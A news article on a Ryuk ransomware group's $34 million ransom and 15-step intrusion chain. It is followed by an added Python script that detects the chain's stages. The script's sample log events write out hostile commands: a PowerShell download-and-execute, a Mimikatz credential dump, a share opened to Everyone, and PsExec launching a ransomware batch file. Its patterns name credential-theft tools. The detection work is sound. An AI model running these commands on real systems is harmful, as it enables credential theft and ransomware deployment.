A Russian-speaking cybercriminal group that targets high-revenue companies and deploys Ryuk ransomware through the Trickbot malware has received $34 million from one of its victims in exchange for a key to recover the encrypted files.
The group is designated “one” after the identifier it uses within the Trickbot botnet, which provides the initial foothold for deploying Ryuk on victims' networks. It is largely indiscriminate in its choice of targets: according to Vitaly Kremez, a researcher at Advanced Intelligence, recent victims of the “one” group include technology and energy companies, financial services firms, healthcare organizations and government agencies.
According to an October report by the security company Check Point, the group attacked an average of 20 victims per week during the third quarter of 2020.
“The average ransom received by Ryuk operators is 48 bitcoins (about $750,000), and since 2018 they have managed to ‘earn’ $150 million in total. Cybercriminals negotiate with their victims in a harsh manner and almost never show leniency,” said Vitaly Kremez.
The largest confirmed ransom that group “one” has obtained is 2,200 bitcoins (about $34 million). After analyzing this attack, the researcher reconstructed a 15-step chain in which the operators discover reachable hosts on the network, steal administrator credentials, and deploy Ryuk.
The attackers rely on publicly available (mostly open-source) tooling from the red-team arsenal: Mimikatz, PowerSploit (PowerShell), LaZagne, AdFind, BloodHound and PsExec.
The 15 steps of the attack are:
- Enumerating the domain with the “Invoke-DACheck” script;
- Dumping credentials from the host with Mimikatz's “sekurlsa::logonpasswords” command;
- Reverting the current token and creating a token for an administrative account from the credentials obtained with Mimikatz;
- Enumerating hosts on the network with “net view”;
- Port-scanning hosts for FTP, SSH, SMB, RDP and VNC services;
- Compiling a list of accessible hosts;
- Uploading the Active Directory query tool AdFind, together with the batch script “adf.bat”, to the hosts found via “net view” and the port scan;
- Identifying the anti-virus product installed on the host with a “WMIC” query;
- Uploading the multi-purpose password recovery tool LaZagne and running it against the host;
- Deleting the password recovery tool;
- Running AdFind and saving its output;
- Removing AdFind artifacts and uploading the collected data;
- Granting full access on the network share to Everyone so that Ryuk can use it;
- Uploading PsExec for remote execution to the prepared hosts and removing the anti-virus products;
- Uploading batch scripts to the network hosts and launching Ryuk via PsExec under the accounts of various compromised users.
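Almost every step in that chain leaves a process-creation event (Sysmon Event ID 1 or Windows Security 4688) whose command line names the tool: Invoke-DACheck, sekurlsa::logonpasswords, net view, a WMIC AntiVirusProduct query, adf.bat/AdFind, LaZagne, net share with Everyone granted full access, and PsExec. The detection sketch below, an added example that is not part of the original article and not Advanced Intelligence's or the group's code, maps each indicator to a stage and raises an alert only when two or more distinct stages appear on the same host within a time window, so that a lone administrator running “net view” does not page anyone. The regex patterns, the stage names, the log format, the window and threshold, and the sample events (including the host names, user names and URL) are all constructed assumptions for the example; the `/grant:everyone,full` and `AntiVirusProduct` strings are the standard syntax those commands use, not a claim about the group's exact command lines.

```python
"""Stage-correlation detection for the Ryuk/Trickbot intrusion chain (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One (stage, pattern) pair per observable step of the chain.  Patterns are
# assumptions derived from the tool names, not captured attacker command lines.
STAGES = [
    ("domain_recon_invoke_dacheck", re.compile(r"invoke-dacheck", re.I)),
    ("credential_dump_mimikatz", re.compile(r"sekurlsa::logonpasswords", re.I)),
    ("network_enum_net_view", re.compile(r"\bnet(?:1)?(?:\.exe)?\s+view\b", re.I)),
    ("av_discovery_wmic", re.compile(r"\bwmic\b.*antivirusproduct", re.I)),
    ("ad_enum_adfind", re.compile(r"\badfind(?:\.exe)?\b|\badf\.bat\b", re.I)),
    ("cred_harvest_lazagne", re.compile(r"\blazagne", re.I)),
    ("share_open_to_everyone",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+share\b.*grant:everyone,full", re.I)),
    ("remote_exec_psexec", re.compile(r"\bpsexe(?:c|svc)(?:\.exe)?\b", re.I)),
]

# Assumed flattened process-creation log format: "<ts> host=<h> user=<u> cmd=<cmdline>"
EVENT_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def parse_event(line):
    """Return {'ts','host','user','cmd'} for a well-formed line, else None."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def classify(cmdline):
    """Return the list of stage names whose indicator appears in the command line."""
    return [name for name, pat in STAGES if pat.search(cmdline)]


def detect(lines, window=timedelta(hours=6), min_stages=2):
    """Map host -> sorted distinct stages, for hosts showing >= min_stages stages
    within any `window`-long span.  Single-stage hits (e.g. one `net view`) are
    deliberately ignored to keep false positives from routine administration low."""
    per_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for stage in classify(ev["cmd"]):
            per_host[ev["host"]].append((ev["ts"], stage, ev["user"]))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        best = set()
        # Sliding window anchored at each hit; keep the window with the most distinct stages.
        for i, (t0, _, _) in enumerate(hits):
            seen = {stage for t, stage, _ in hits[i:] if t - t0 <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts


# Constructed sample events (not real telemetry): WS-014 runs the recon/credential
# phase, DC-01 the deployment phase, WS-022 is a benign admin doing a single net view.
SAMPLE_EVENTS = [
    "2020-11-05T10:02:11Z host=WS-014 user=CORP\\jsmith cmd=powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-DACheck.ps1'); Invoke-DACheck\"",
    "2020-11-05T10:05:40Z host=WS-014 user=CORP\\jsmith cmd=mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit",
    "2020-11-05T10:07:02Z host=WS-014 user=CORP\\jsmith cmd=net view /all",
    "2020-11-05T10:09:13Z host=WS-014 user=CORP\\jsmith cmd=wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName",
    "2020-11-05T10:15:55Z host=WS-014 user=CORP\\jsmith cmd=cmd.exe /c adf.bat",
    "2020-11-05T12:30:00Z host=DC-01 user=CORP\\svc_backup cmd=net share share$=C:\\ /grant:everyone,full",
    "2020-11-05T12:41:18Z host=DC-01 user=CORP\\svc_backup cmd=psexec.exe \\\\FS-01 -accepteula -d -u CORP\\svc_backup cmd /c C:\\share$\\ryuk.bat",
    "2020-11-05T09:00:00Z host=WS-022 user=CORP\\alee cmd=net view \\\\printserver",
    "2020-11-06T08:00:00Z host=WS-022 user=CORP\\alee cmd=notepad.exe C:\\Users\\alee\\notes.txt",
]

if __name__ == "__main__":
    for host, stages in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

On the sample data WS-014 is flagged with five stages and DC-01 with the share-opening and PsExec stages, while WS-022's single `net view` produces nothing. In production the share-to-Everyone and PsExec-with-batch-script indicators are severe enough to alert on alone; the threshold and window here are tunable starting points, not a recommendation.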
As a reminder, technology companies and government agencies recently disrupted the TrickBot malware infrastructure, although some security experts note that TrickBot is resilient and may well be revived.